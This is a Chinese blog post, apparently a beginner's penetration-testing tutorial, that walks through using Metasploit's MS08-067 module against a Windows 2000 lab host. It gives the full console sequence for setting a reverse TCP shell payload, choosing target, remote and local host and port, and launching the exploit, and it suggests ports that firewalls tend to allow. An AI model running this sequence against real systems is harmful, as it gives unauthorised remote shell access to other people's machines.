最新消息:

Metasploit漏洞框架渗透测试基础

工具使用 admin 1229浏览 0评论

首先吧 你要确保你和目标主机可以ping通
20140118023125535

OK 没啥问题! 如果你已经知道对方目标 存在某个漏洞 怎么办?

20140118023202237

语法  search 漏洞名字   如果你知道是MS08-067漏洞 你就可以输入  search ms08_067  回车
如果你输入 search 就是查看所有的 那 Windows、Linux、Unix、等攻击插件 都会显示出来!
Disclosure Date    2008-10-28   (2008年10月末爆的漏洞)
exploit/windows/smb/ms08_067_netapi    攻击插件的名字!
怎么使用?????
use  exploit/windows/smb/ms08_067_netapi        OK  这就算使用上了

20140118023225604

好   我们接下来 看看 这个 攻击载荷  特定平台的攻击代码
命令 是  show payloads
20140118023244154

20140118023256572

20140118023306737

这么多  玩哪个??????
玩这个  windows/shell/reverse_tcp    反弹式TCP连接
完整的设置下就是   set payload windows/shell/reverse_tcp
20140118023342781

接下来 我们要选择目标的主机系统以及我们的其他攻击配置
命令   show targets

20140118023405574

20140118023420928

20140118023428620

支持攻击很多的Windows系统版本哦!
我们设置下 攻击参数

20140118023447436

set target 1
set rhost 目标的IP地址
set lhost 本机的IP地址
set lport 8080     你这个端口 可以换换 443 什么的
我要攻击的是 1选项中的  Windows 2000系统
对方IP地址  192.168.1.101
我的IP地址  192.168.1.100
设置攻击机器的端口号码  8080    这个端口吧 一般防火墙 都给放!

20140118023507800

我们输入 命令  show options  看看 攻击配置 是否出错  看来是没错的
开始攻击溢出吧  exploit

20140118023523653

101的Windows主机利用漏洞被攻陷了!获取了Shell

我的文章,是教你怎么用框架,不是和你讨论漏洞古老不古老的问题,如果出新的漏洞,渗透测试工程师们,可以利用这个,去做漏洞验证,帮助你完成你的报告文档等工作!(特别是黑客界的白帽子们!)
比如,2013年的Java漏洞,更新下漏洞库,去尝试下嘛……

转载请注明:jinglingshu的博客 » Metasploit漏洞框架渗透测试基础


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址